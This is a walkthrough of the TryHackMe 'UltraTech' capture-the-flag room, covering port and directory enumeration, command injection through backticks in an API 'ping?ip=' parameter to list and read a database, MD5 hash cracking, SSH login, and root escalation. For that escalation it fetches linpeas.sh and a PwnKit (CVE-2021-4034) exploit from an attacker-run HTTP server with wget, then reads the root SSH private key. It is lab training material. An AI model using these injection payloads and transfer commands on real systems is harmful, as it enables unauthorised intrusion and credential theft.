TryHackMe: UltraTech

!#Tasks

##Task 1:

!>Deploy the machine

<>: Deploy the machine

> No answer needed

##Task 2 :

!>It’s enumeration time!

<>: Which software is using the port 8081?

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.102.70

Ans: N******

<>: Which other non-standard port is used?

Command: sudo nmap -sT -p- -sV -T5 -oN nmap/all_ports 10.10.102.70

Ans: 3****

<>: Which software using this port?

Ans: A*****

<>: Which GNU/Linux distribution seems to be used?

Ans: U*****

<>: The software using the port 8080 is a REST api, how many of its routes are used by the web application?

Command: gobuster dir -u http://10.10.102.70:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Ans: *

>: Let’s check the sites

>: Scan the port we just found

Command: gobuster dir -u http://10.10.102.70:31331/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

>: Let’s look at the path from / js

>: Look at api.js

>: Let’s look at and check how the api we found works

>: After checking and pinging, everything looks great

##Task 3:

!>Let the fun begin

! There is a database lying around, what is its filename?

Url : http://10.10.102.70:8081/ping?ip=`ls`

! What is the first user’s password hash?

http://10.10.102.70:8081/ping?ip=`cat%20u****.**.******`

Yalniz birinin sifresi qirilir

! What is the password associated with this hash?

Url: https://www.md5online.org/md5-decrypt.html

>: Let’s check the entry with ssh

Command: ssh r00t@10.10.102.70

##Task 4

!>The root of all evil

!What are the first 9 characters of the root user’s private SSH key?

>: Let’s look at the vulnerabilities to gain authority

>: We can do it manually. But I will use Linpeas.sh, an automated tool

>: You can download the tool here:

https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

>: Let’s start the transfer

>: From our terminal
Command: python3 -m http.server 80

>: From target terminal
Command: wget http://10.8.223.65/linpeas.sh

>: Give permission and get started
Command: chmod +x linpeas.sh
Command: ./linpeas.sh

We found some vulnerability

>: I decided to use CVE-2021–4034

>: You can download the exploit here

GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in…

>: Let’s start the transfer

>: From our terminal

Command: python3 -m http.server 80

>: From target terminal

Command: wget http://10.8.223.65/pwnkit.c

>:Prepare and started

Command: gcc pwnkit.c -o exploit

Command: ./exploit

And now we are the root

Now let’s go and do the last task
Command : cat /root/.ssh/id_rsa

“If you have any questions or comments, please do not hesitate to write. Have a good days”

Elman Alizadeh - Azerbaijan Architecture and Construction University - Baku, Baku, Azerbaijan |…